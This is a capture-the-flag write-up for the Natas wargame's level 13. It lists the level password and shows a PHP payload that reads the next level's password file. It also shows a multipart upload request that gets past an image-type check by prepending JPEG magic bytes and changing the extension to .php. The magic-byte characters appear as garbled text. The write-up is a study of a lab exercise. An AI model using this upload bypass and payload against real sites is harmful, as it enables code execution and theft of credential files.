# Username
natas13
# Password
trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC
# Web vulnerability
Insecure file upload, filter bypass
# Method of solve
Like the previous level, the goal is to upload an insecure file and access it to get access to the password. The malicious file contents will be the following
```
<?php echo file_get_contents('/etc/natas_webpass/natas14'); ?>
```
However there is new code on this webpage that will make uploading this file more difficult. In particular, this section of the webpage code
```
else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
```
The exif_imagetype PHP function checks for "magic bytes" in the contents of the file, which is a filetype indentifier determined by the first four bytes of a file. For example, the first four bytes of JPEG files are
```
د؈
```
To make it easier, start up Burp Suite, open the Burp Browser, then record uploading a legitimate JPEG image. In Kali Linux, there's a small JPEG file at the following location
```
/usr/lib/python3/dist-packages/IPython/core/tests/2x2.jpg
```
Once we record the POST request to the app, we can send that request to the Repeater tool. We'll replay the request in the Repeater with the following adjustments...
```
------WebKitFormBoundary1jL3sRu3kAyO7l5U
Content-Disposition: form-data; name="filename"

qleupdwg3a.php
------WebKitFormBoundary1jL3sRu3kAyO7l5U
Content-Disposition: form-data; name="uploadedfile"; filename="2x2.jpg"
Content-Type: image/jpeg

د؈<?php echo file_get_contents('/etc/natas_webpass/natas14'); ?>
```
Note that we changed the random-string filename extension from .jpg to .php. We also need to edit the contents of the upload so that the PHP code is written immediately after the first four bytes, the "yoya" characters. After that is done, we send the request, and are informed of a endpoint where our file was uploaded. Upon accessing this endpoint, we receive the password
